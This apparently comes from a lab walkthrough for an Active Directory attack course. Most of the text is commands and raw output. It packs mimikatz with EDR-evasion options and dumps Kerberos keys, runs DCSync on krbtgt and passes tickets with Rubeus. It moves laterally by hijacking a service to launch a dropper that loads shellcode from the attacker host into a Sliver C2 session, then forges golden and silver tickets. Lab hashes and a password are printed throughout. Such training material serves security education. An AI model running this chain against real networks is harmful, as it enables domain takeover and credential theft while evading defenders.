(( / )) .----~-.\ \-' .~ \ `. \^-.
///.----..> \ _ -~ `. ^-` ^-_
///-._ _ _ _ _ _ _}^ - - - - ~ ~-- ,.-~
/.-~
---------------------------------------------------------------------------
---------------------------------------------------------------------------
[?] Unhook enabled
[?] Anti-debug enabled
[?] Fluctuate: NA
[?] Output format: dotnet
[?] Waiting 5 seconds before executing the payload
[?] Processing /mnt/c/AD/Tools/PEzor/mimikatz.exe
[?] PE detected: /mnt/c/AD/Tools/PEzor/mimikatz.exe: PE32+ executable (consol
e) x86-64, for MS Windows
[?] Building .NET executable
[?] Executing donut

[ Donut shellcode generator v1 (built Jan 15 2024 02:44:21)
[ Copyright (c) 2019-2021 TheWover, Odzhan
[ Instance type : Embedded

[ Module file : "/mnt/c/AD/Tools/PEzor/mimikatz.exe"
[ Entropy : Random names + Encryption
[ Compressed : aPLib (Reduced by 55%)
[ File type : EXE
[ Parameters : "privilege::debug" "token::elevate" "sekurlsa::ekeys" "ex
it"
[ Target CPU : x86+amd64
[ AMSI/WDLP/ETW : continue
[ PE Headers : overwrite
[ Shellcode : "/tmp/tmp.TIlIVd9TSn/shellcode.bin.donut"
[ Exit : Thread
[!] Done! Check /mnt/c/AD/Tools/PEzor/mimikatz.exe.packed.dotnet.exe: PE32+ e
xecutable (console) x86-64 Mono/.Net assembly, for MS Windows
PEzor:
-z 2: donut args --> Pack/Compress the input file. 1=None, 2=
aPLib
-sgn: Encode the generated shellcode with sgn
-unhook: User-land hooks removal
-antidebug: Add anti-debug checks
-fluctutate=NA: fluctuate to NOACCESS when sleeping

-format=dotnet: Outputs result in dotnet format
-p: paramerters
root@dcorp-studentX:/mnt/c/AD/Tools/PEzor# mv /mnt/c/AD/Tools/PEzor/mimikatz.
exe.packed.dotnet.exe /mnt/c/AD/Tools/PEzor/mimikatz-ekeys.exe.packed.dotnet.
exe
NOTE: We rename the generated file for ease of reusability in later objectives.
Dump logonpasswords/ekeys using mimikatz.exe.packed.dotnet.exe on the new dcorp-mgmt Sliver

session.
[server] sliver (dcorp-ci_tcp) > sessions -i 945ae759
[*] Active session dcorp-mgmt_tcp (945ae759)
[server] sliver (dcorp-mgmt_tcp) > ps

====== ====== ============================== ======== ================== ====
[......snip......]
1204 596 dcorp\svcadmin x86_64 sqlservr.exe 0
2476 388 dcorp\mgmtadmin x86_64 taskhostw.exe 2

[server] sliver (dcorp-mgmt_tcp) > execute-assembly -P 1204 -p 'C:\Program Fi
les\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe' -t 180
/mnt/c/AD/Tools/PEzor/mimikatz-ekeys.exe.packed.dotnet.exe
[*] Output:
.#####. mimikatz 2.1.1 (x64) #17763 Dec 9 2018 23:56:50

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
[snip]
mimikatz(commandline) # sekurlsa::ekeys
Authentication Id : 0 ; 159488 (00000000:00026f00)

Session : Service from 0
User Name : svcadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 1/15/2024 5:58:54 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1118
*
Username : svcadmin
*
Domain : DOLLARCORP.MONEYCORP.LOCAL
*
Password : (null)
*
Key List :
des_cbc_md4 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca
2835067719dc7011
des_cbc_md4 b38ff50264b74508085d82c69794a4d8
We can also look for credentials from the credentials vault. Interesting credentials like those used for
scheduled tasks are stored in the credential vault. Use the mimikatz command: "vault::cred /patch".
Use PEzor back in the root Ubuntu terminal to convert mimikatz with the following arguments again.
'"privilege::debug" "token::elevate" "vault::cred /patch" "exit"'
________________
[?] Unhook enabled


[?] Fluctuate: NA
[?] Executing donut


[ File type : EXE
[ Parameters : "privilege::debug" "token::elevate" "vault::cred /patch"
"exit"
[ Shellcode : "/tmp/tmp.Z8CAXqRjUk/shellcode.cs"
[ Exit : Thread
exe.packed.dotnet.exe /mnt/c/AD/Tools/PEzor/mimikatz-vaultcred.exe.packed.dot
net.exe
Execute the mimikatz-vaultcred.exe.packed.dotnet.exe binary in the dcorp-mgmt Sliver session as

before.
[server] sliver (dcorp-mgmt_tcp) > execute-assembly -P 1204 -p 'C:\Program Fi
les\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe' -t 180
/mnt/c/AD/Tools/PEzor/mimikatz-vaultcred.exe.packed.dotnet.exe
[*] Output:
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
588 {0;000003e7} 1 D 16588 NT AUTHORITY\SYSTEM S-1-5-18

(04g,21p) Primary
-> Impersonated !
* Process Token : {0;00026f00} 0 D 655341 dcorp\svcadmin S-1-5-21-7198
15819-3726368948-3917688648-1118 (16g,25p) Primary
* Thread Token : {0;000003e7} 1 D 674982 NT AUTHORITY\SYSTEM S-1-5
-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # vault::cred /patch
mimikatz(commandline) # exit
Bye!
We can now impersonate the domain admin credentials to move laterally using the Rubeus asktgt
module. We use the /ptt option to import the ticket into the current session. Switch back to the dcorp-
stdX session and perform the import.
NOTE: We can perform this in a sacrifical logon using the make-token process but for the case of
simplicity we perform most ticket imports in our original session LUID.
[server] sliver (dcorp-mgmt_tcp) > sessions -i 49cfa06f

[*] Active session dcorp-std_https (49cfa06f)
[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'C:\windows\s

ystem32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/Rubeus.exe 'asktgt /user:svcadmi
n /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /o
psec /show /ptt'
[*] Output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Ask TGT
[*] Showing process : True

[*] Username : CMXYK90V
[*] Domain : WKIESTM5

[*] Password : HAB7FAYP
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with
LOGON_TYPE = 9
[+] ProcessID : 2520
[+] LUID : 0xaab77
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)

[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash: 6366243a657a4ea04e406f1abc27f1ada358ccd0
138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 699255
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGAjCCBf6gAwIBB[snip]
[*] Target LUID: 0xaab77

[+] Ticket successfully imported!
ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 1/15/2024 6:30:41 AM
EndTime : 1/15/2024 4:30:41 PM
RenewTill : 1/22/2024 6:30:41 AM
Flags : name_canonicalize, pre_authent, initial, renewa
ble, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : fbhvuQhtRTYbD483RPrHQxsjm6hPnOhjtdU2YbhrfLk=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5C
A2835067719DC7011
[server] sliver (dcorp-std_https) > ls '\\dcorp-dc\c$'
\\dcorp-dc\c$\ (15 items, 1.3 GiB)

==================================
drwxrwxrwx $Recycle.Bin <dir> Thu Dec 1
4 04:15:02 -0800 2023
drwxrwxrwx $WinREAgent <dir> Tue Jan 0
9 11:13:39 -0800 2024
[...........snip...........]
Analyze / purge imported tickets using the klist / purge options in Rubeus.

ystem32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/Rubeus.exe purge
[*] Output:
[*] Action: Purge Tickets

Luid: 0x0
[+] Tickets successfully purged!

Escalate privileges to Domain Admin: via derivative admin
Using scshell, PEzor & Rubeus
Now moving on to the next task, we need to escalate to domain admin using derivative local admin
(dcorp-adminsrv).
From before it is noted that dcorp\studentX has admin privileges over dcorp-adminsrv, switch back to
the dcorp-stdX session and move laterally to dcorp-adminsrv as shown previously in Objective 5.
[*] Session 8f564dcc dcorp-adminsrv_tcp - 172.16.100.X:50152->dcorp-std_https
-> (dcorp-adminsrv) - windows/amd64 - Tue, 16 Jan 2024 06:26:26 PST
server] sliver (dcorp-std_https) > sessions -i 8f564dcc

[*] Active session dcorp-adminsrv_tcp (8f564dcc)
Enumerating privileges we find that we have SYSTEM privileges.

[server] sliver (dcorp-adminsrv_tcp) > whoami
Logon ID: NT AUTHORITY\SYSTEM

[*] Current Token ID: NT AUTHORITY\SYSTEM
We can now use the previously PEzor generated mimikatz-ekeys.exe.packed.dotnet.exe binary to dump
AES logonpasswords on the target.
[server] sliver (dcorp-adminsrv_tcp) > ps

====== ====== ================= ======== ================== ====
0 0 [System Process] -
[.......snip.......]
3392 796 NT AUTHORITY\SYSTEM x86_64 MoUsoCoreWorker.exe 0

3184 668 NT AUTHORITY\SYSTEM x86_64 dcorp-adminsrv_tcp.exe
0
[server] sliver (dcorp-adminsrv_tcp) > execute-assembly -P 3184 -p 'C:\window

s\system32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/PEzor/mimikatz-ekeys.exe.pac
ked.dotnet.exe'
[*] Output:

.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM

540 {0;000003e7} 1 D 17297 NT AUTHORITY\SYSTEM S-1-5-18
(04g,21p) Primary
-> Impersonated !
* Process Token : {0;0000fa32} 0 D 398166 dcorp\appadmin S-1-5-21-1874
506631-3219952063-538504511-1117 (13g,24p) Primary
* Thread Token : {0;000003e7} 1 D 411322 NT AUTHORITY\SYSTEM S-1-5
-18 (04g,21p) Impersonation (Delegation)
Authentication Id : 0 ; 225972 (00000000:000372b4)
Session : RemoteInteractive from 2
Authentication Id : 0 ; 225972 (00000000:000372b4)

User Name : srvadmin
Domain : dcorp
Logon Time : 3/3/2023 2:42:41 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1115
* Username : srvadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1d
bb4
rc4_hmac_nt a98e18228819e8eec3dfa33cb68b0728
rc4_hmac_old a98e18228819e8eec3dfa33cb68b0728
rc4_md4 a98e18228819e8eec3dfa33cb68b0728
rc4_hmac_nt_exp a98e18228819e8eec3dfa33cb68b0728
rc4_hmac_old_exp a98e18228819e8eec3dfa33cb68b0728
[snip]

Switch back to the dcorp-stdX session and use Rubeus now to get a TGT with the AES hash of
dcorp\srvadmin.
[server] sliver (dcorp-adminsrv_tcp) > sessions -i 49cfa06f
[*] Active session dcorp-std_https (49cfa06f)

ystem32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/Rubeus.exe 'asktgt /user:srvadmi
n /aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4 /o
psec /show /ptt'
[*] rubeus output:
[*] Action: Ask TGT

[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsrvadmin
[*] Using aes256_cts_hmac_sha1 hash: 145019659e1da3fb150ed94d510eb770276cfbd0
cbd834a4ac331f2effe1dbb4
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\srvadmin'
doIF+AyNDAxMj[snip]
UserName : srvadmin
StartTime : 1/16/2024 1:34:44 AM
EndTime : 1/16/2024 11:34:44 AM
RenewTill : 1/23/2024 1:34:44 AM
ble, forwardable
Base64(key) : DgapjlJWNDAC2EsEE3okPT4S0ITKnCTtu+kP/zApFws=
ASREP (key) : 145019659E1DA3FB150ED94D510EB770276CFBD0CBD834A
4AC331F2EFFE1DBB4
Find Local Admin Access using LACheck as dcorp\srvadmin

ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/LACheck.exe' 'winrm /ldap:serve
rs-exclude-dc /threads:10 /domain:dollarcorp.moneycorp.local'
[*] Output:

rpc: False
smb: False
winrm: True
/bloodhound: False
/dc:
/edr: False
/logons: False
/registry: False
/services: False
/ou:
/socket:
/targets:
/threads: 10
/verbose: False
[WinRM] Admin Success: DCORP-ADMINSRV.DOLLARCORP.MONEYCORP.LOCAL as studentX@
[WinRM] Admin Success: DCORP-MGMT.DOLLARCORP.MONEYCORP.LOCAL as studentX@doll
arcorp.moneycorp.local
Since we have local admin access to dcorp-mgmt as dcorp\srvadmin we can go moving laterally onto
dcorp-mgmt, extracting credentials for dcorp\svcadmin as shown in the last section and gaining domain
admin privileges.
Purge the ticket using rubeus once done.

ystem32\taskhostw.exe' -t 80 /mnt/c/AD/Tools/Rubeus.exe purge
[*] rubeus output:

Luid: 0x0

• Extract secrets from the domain controller of dollarcorp.
• Using the secrets of krbtgt account, create a Golden ticket.
• Use the Golden ticket to (once again) get domain admin privileges from a machine.
Extract secrets from the domain controller of dollarcorp

Using PEzor, Rubeus and Remote-sc-*
In the dcorp-stdX session let us use the found credentials for dcorp\svcadmin to move laterally onto
dcorp-dc.
We can impersonate the domain admin credentials using the Rubeus asktgt module as in the previous
objective.
psec /show /ptt'
[*] Output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Ask TGT

LOGON_TYPE = 9
[+] LUID : 0xaab77


138ec5ca2835067719dc7011

UserName : svcadmin
StartTime : 1/15/2024 6:30:41 AM
EndTime : 1/15/2024 4:30:41 PM
RenewTill : 1/22/2024 6:30:41 AM
ble, forwardable
A2835067719DC7011

==================================
4 04:15:02 -0800 2023
9 11:13:39 -0800 2024
[...........snip...........]
We can now use scshell to move laterally. Before doing so we enumerate services remotely to target.
Enumerate remote services using the sa-sc-enum command (BOF).
[server] sliver (dcorp-ci_tcp) > sa-sc-enum dcorp-dc
[*] Successfully executed sa-sc-enum (coff-loader)

[*] Got output:
[.............snip..............]
SERVICE_NAME: wmiApSrv

DISPLAY_NAME: WMI Performance Adapter
TYPE : 16 WIN32_OWN
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0
CHECKPOINT : 0
WAIT_HINT : 0
PID : 0
FLAGS : 0
TYPE : 10 WIN32_OWN
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\system32\wbem\WmiApSrv.ex
e
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : WMI Performance Adapter
DEPENDENCIES :
SERVICE_START_NAME : localSystem
REBOOT_MESSAGE :
COMMAND_LINE :
ds
ds
FAILURE_ACTIONS : NONE -- Delay = 0 milliseconds
Querying the service using the sa-sc-sq BOF we find that the wmiApSrv service runs as SYSTEM, hence
this is a good target service for credential dumping.
Begin by setting up / reusing the pivot listener on dcorp-stdX - port 8080 and generate an appropriate
tcp pivot implant.

shellcode -e --name dcorp-dc_tcp
[*] Implant saved to /mnt/c/AD/Tools/Sliver/dcorp-dc_tcp.bin
Upload the NtDropper to the dcorp-dc temp folder.

[server] sliver (dcorp-std_https) > upload -t 180 '/mnt/c/AD/Tools/NtDropper.
exe' '\\dcorp-dc\c$\Windows\Temp\NtDropper.exe'
[*] Wrote file to \\dcorp-dc\c$\Windows\Temp\NtDropper.exe

Host the generated shellcode using WSL or HFS.
Now use scshell to gain a SYSTEM tcp pivot session on dcorp-dc.
NOTE: Attempt execution multiple times if it fails on the first attempt.

[server] sliver (dcorp-std_https) > scshell -t 180 dcorp-dc wmiApSrv 'C:\Wind
ows\System32\cmd.exe /c start /b C:\Windows\temp\NtDropper.exe 172.16.100.X d
corp-dc_tcp.bin'

[*] Got output:
Trying to connect to dcorp-dc
SC_HANDLE Manager 0x0000000000126c10
Opening wmiApSrv
SC_HANDLE Service 0x0000000000126eb0
LPQUERY_SERVICE_CONFIGA need 0x0000013a bytes
Original service binary path "C:\Windows\system32\wbem\WmiApSrv.exe"
Service path was changed to "C:\Windows\System32\cmd.exe /c start /b C:\Windo
ws\temp\NtDropper.exe 172.16.100.X dcorp-dc_tcp.bin"
Service was started
Service path was restored to "C:\Windows\system32\wbem\WmiApSrv.exe"
[*] Session 56b853d7 dcorp-dc_tcp - 172.16.100.X:50024->dcorp-std_https-> (dc

orp-dc) - windows/amd64 - Wed, 17 Jan 2024 04:16:07 PST
[server] sliver (dcorp-std_https) > sessions -i 56b853d7

[*] Active session dcorp-dc_tcp (56b853d7)

Access the dcorp-dc session spawned and use the previously generated PEzor repackaged C# Mimikatz
binary to dump logonpasswords.
[server] sliver (dcorp-dc_tcp) > whoami
Logon ID: NT AUTHORITY\SYSTEM/b

[server] sliver (dcorp-dc_tcp) > ps

====== ====== ============================== ======== ======== ========
[.......snip........]
6488 772 NT AUTHORITY\NETWORK SERVICE x86_64 svchost.exe

0
2780 772 NT AUTHORITY\SYSTEM x86_64 WmiApSrv.exe
0
6872 3804 x86_64 SenseIR.exe
0
Security Product(s): Windows Defender MDE, Windows Defender, Windows Defender

MDE
[server] sliver (dcorp-dc_tcp) > execute-assembly -P 2780 -p 'C:\windows\syst

em32\wbem\WmiApSrv.exe' -t 180 '/mnt/c/AD/Tools/PEzor/mimikatz-ekeys.exe.pack
ed.dotnet.exe'
[*] Output:
[snip]
Authentication Id : 0 ; 1879285 (00000000:001cacf5)

Session : Batch from 0
User Name : Administrator
Domain : dcorp
Logon Time : 1/17/2024 4:23:55 AM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : Administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :

des_cbc_md4 87918d4c83a2aeb422999d908381bdeb1cef476195d3e532
e5b1585adee6a12b
des_cbc_md4 af0686cc0ca8f04df42210c9ac980760
Authentication Id : 0 ; 886621 (00000000:000d875d)

User Name : svcadmin
Domain : dcorp
Logon Time : 1/17/2024 4:14:19 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1118
*
Username : svcadmin
*
Domain : DOLLARCORP.MONEYCORP.LOCAL
*
Password : (null)
*
Key List :
des_cbc_md4 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca
2835067719dc7011
Authentication Id : 0 ; 823134 (00000000:000c8f5e)

Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 1/17/2024 4:13:59 AM
SID : S-1-5-90-0-2
*
Username : DCORP-DC$
*
Domain : dollarcorp.moneycorp.local
*
Password : cd 86 [snip]
*
Key List :
des_cbc_md4 064e5b7d9d78d3645e786a30df02b5893bf7cb44ba117495
38896c0e66f953d3
des_cbc_md4 c7e5d82f4b335144af5fcd6775069b18
des_cbc_md4 36abeac4022fa23f94dd8480c67b5e6e

Create and abuse a Golden ticket
Using PEZor and Rubeus
To begin creating a Golden ticket we require the krbtgt hash from dcorp-dc. We can do this by directly
executing lsadump::lsa /inject or by performing a DCSync locally or remotely using lsadump::dcsync
/user:dcorp\krbtgt. We will be showcasing the DCSync method.
Back on dcorp-stdX, spawn a new Ubuntu WSL prompt and use PEZor as before to convert mimikatz into
a .NET binary with DCSync arguments and rename the binary accordingly as follows.

'"privilege::debug" "lsadump::dcsync /user:dcorp\krbtgt" "exit"'
---------------------------------------------------------------------------
[?] Unhook enabled
[?] Fluctuate: NA
[?] Executing donut


[ File type : EXE
[ Parameters : "privilege::debug" "lsadump::dcsync /user:dcorp\krbtgt" "
exit"
[ Shellcode : "/tmp/tmp.LZON5B8Mqa/shellcode.cs"
[ Exit : Thread

exe.packed.dotnet.exe /mnt/c/AD/Tools/PEzor/mimikatz-dcsync.exe.packed.dotnet
.exe
DCSync from the dcorp-stdX session (remotely) or use the current dcorp-dc session using mimikatz-
dcsync.exe.packed.dotnet.exe.
[server] sliver (dcorp-dc_tcp) > execute-assembly -P 2780 -p 'C:\windows\syst
em32\wbem\WmiApSrv.exe' -t 180 '/mnt/c/AD/Tools/PEzor/mimikatz-dcsync.exe.pac
ked.dotnet.exe'
[*] Output:
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08

Privilege '20' OK
mimikatz(commandline) # lsadump::dcsync /user:dcorp\krbtgt

[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt

Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 9:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502
Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b
3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80
* Primary:Kerberos *
Credentials
des_cbc_md5 : 150ea2e934ab6b80
* Packages *
NTLM-Strong-NTOWF
Bye!
[..........snip........]
Craft a Golden Ticket from the dcorp-stdX session using Rubeus and the krbtgt AES hash abusing SID
History injection. We can
We can save the ticket as golden.tkt using the Rubeus /outfile parameter for persistent usage, or
optionally use the /ptt argument here instead to gain the ticket privileges in the current session.
NOTE: Since fork and run execution are limited to 256 characters, we can use inline-execute-assembly
instead to overcome the argument limitation.
[server] sliver (dcorp-std_https) > inline-execute-assembly -t 80 /mnt/c/AD/T

ools/Rubeus.exe 'golden /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3
d914cbcb5a8c3cda848 /user:administrator /id:1000 /domain:dollarcorp.moneycorp
.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122
-960912869-3279953914-516,S-1-5-9 /dc:DCORP-DC.dollarcorp.moneycorp.local /pt
t'
[*] Successfully executed inline-execute-assembly (coff-loader)

[*] Got output:
[+] Success - Wrote 1040169 bytes to memory
[+] Using arguments: golden /aes256:154cb6624b1d859f7080a6615adc488f09f928438
79b3d914cbcb5a8c3cda848 /user:dcorp-dc$ /id:1000 /domain:dollarcorp.moneycorp
.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122
-960912869-3279953914-516,S-1-5-9 /dc:DCORP-DC.dollarcorp.moneycorp.local /pt
t
[*] Action: Build TGT

[*] Building PAC
[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (DOLLARCORP)

[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 1000
[*] Groups : 520,512,513,519,518
[*] ExtraSIDs : S-1-5-21-335606122-960912869-3279953914-516,S-1-5-9
[*] ServiceKey : 154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8
C3CDA848
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : 154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8
C3CDA848
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : krbtgt
[*] Target : dollarcorp.moneycorp.local
[*] Generating EncTicketPart

[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'administrator@dollarcorp.moneycorp.local'
[*] AuthTime : 1/17/2024 5:33:54 AM

[*] StartTime : 1/17/2024 5:33:54 AM
[*] EndTime : 1/17/2024 3:33:54 PM
[*] RenewTill : 1/24/2024 5:33:54 AM
doIGVDCCBlCgAwIB[snip]
[+] inlineExecute-Assembly Finished
We can persistently now use this ticket to gain DA privileges anytime. Check if we have Domain Admin
(dcorp\svcadmin) access to dcorp-dc by listing shares.
ools/Rubeus.exe klist

[*] Got output:
[+] Using arguments: klist
Action: List Kerberos Tickets (Current User)

[*] Current LUID : 0xd01c0
UserName : studentX
Domain : dcorp
LogonId : 0xd01c0
UserSID : S-1-5-21-719815819-3726368948-3917688648-5101
AuthenticationPackage : Negotiate
LogonType : RemoteInteractive
LogonTime : 1/17/2024 12:45:33 AM
LogonServer : DCORP-DC
LogonServerDNSDomain : DOLLARCORP.MONEYCORP.LOCAL
UserPrincipalName : studentX@dollarcorp.moneycorp.local
[0] - 0x12 - aes256_cts_hmac_sha1

Start/End/MaxRenew: 1/17/2024 5:33:54 AM ; 1/17/2024 3:33:54 PM ; 1/24/
2024 5:33:54 AM
Server Name : krbtgt/dollarcorp.moneycorp.local @ DOLLARCORP.MONE
YCORP.LOCAL
Client Name : administrator @ DOLLARCORP.MONEYCORP.LOCAL
Flags : pre_authent, initial, renewable, forwardable (40e00
000)

==================================
4 04:15:02 -0800 2023
6 03:11:43 -0800 2024
[snip]
Make sure to purge existing tickets once done.

ools/Rubeus.exe purge

Luid: 0x0

Try to get command execution on the domain controller by creating silver ticket for:
• HOST service
• WMI
Command execution on dcorp-dc via HOST service

Using Rubeus, PEzor and Sa-schtasksenum
We will use the compromised dcorp-dc$ ntlm hash from the last objective to craft a Silver ticket to
access the HOST service using rubeus. We supply our student credentials in the /creduser and
/credpassword to avoid any inconsistencies with the /ldap parameter.
NOTE: Reboot the computer if you find inconsistencies with ticket imports since we are leveraging our
current session again using inline-execute-assembly as in the previous objective.

ools/Rubeus.exe 'silver /service:host/dcorp-dc.dollarcorp.moneycorp.local /rc
4:36abeac4022fa23f94dd8480c67b5e6e /sid:S-1-5-21-719815819-3726368948-3917688
648 /user:Administrator /domain:dollarcorp.moneycorp.local /ptt /ldap /credus
er:dollarcorp.moneycorp.local\studentX /credpassword:JPIzbuWHdSfq9NFr'
[*] rubeus output:
[snip]
[*] Action: Build TGS

[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 520,512,513,519,518
[*] ServiceKey : 36ABEAC4022FA23F94DD8480C67B5E6E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : 36ABEAC4022FA23F94DD8480C67B5E6E
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : host
[*] Target : dcorp-dc.dollarcorp.moneycorp.local

[*] Signing PAC
[*] Forged a TGS for 'Administrator' to 'host/dcorp-dc.dollarcorp.moneycorp.l
ocal'

[*] AuthTime : 1/17/2024 7:05:15 AM
[*] StartTime : 1/17/2024 7:05:15 AM
[*] EndTime : 1/17/2024 5:05:15 PM
[*] RenewTill : 1/24/2024 7:05:15 AM
[*] base64(ticket.kirbi): [snip]

We can prove we have rights to access the HOST service by accessing scheduled tasks using the inbuilt
sa-schtasksenum command which enumerates scheduled tasks on the target host.
[server] sliver (dcorp-std_https) > sa-schtasksenum -t 40 dcorp-dc.dollarcorp
.moneycorp.local
[*] Successfully executed sa-schtasksenum (coff-loader)

[*] Got output:
Task 1
Name: Browse
Path: \Browse
Enabled: True
Last Run: 1/17/2024 7:09:55 AM
Next Run: 12:00:00 AM
Current State: READY
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/t
ask">
<RegistrationInfo>
<Date>2022-11-14T19:42:09</Date>
<Author>dcorp\administrator</Author>
<URI>\Browse</URI>
</RegistrationInfo>
<Principals>
<Principal id="Author">
<UserId>S-1-5-21-1874506631-3219952063-538504511-500</UserId>
<LogonType>Password</LogonType>
</Principal>
</Principals>
<Settings> <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
</Settings>
[.............snip.............]
To proceed to get a shell via schtasks we can use an external tool such as SharpTask.

Command execution on dcorp-dc via WMI service
Using Rubeus and sharp-wmi
Similarly, for WMI access we need to create 2 silver tickets using HOST and RPCSS. Since HOST is already
imported go ahead importing RPCSS using rubeus.
ools/Rubeus.exe 'silver /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /r
c4:36abeac4022fa23f94dd8480c67b5e6e /sid:S-1-5-21-719815819-3726368948-391768
8648 /user:Administrator /domain:dollarcorp.moneycorp.local /ptt /ldap /credu
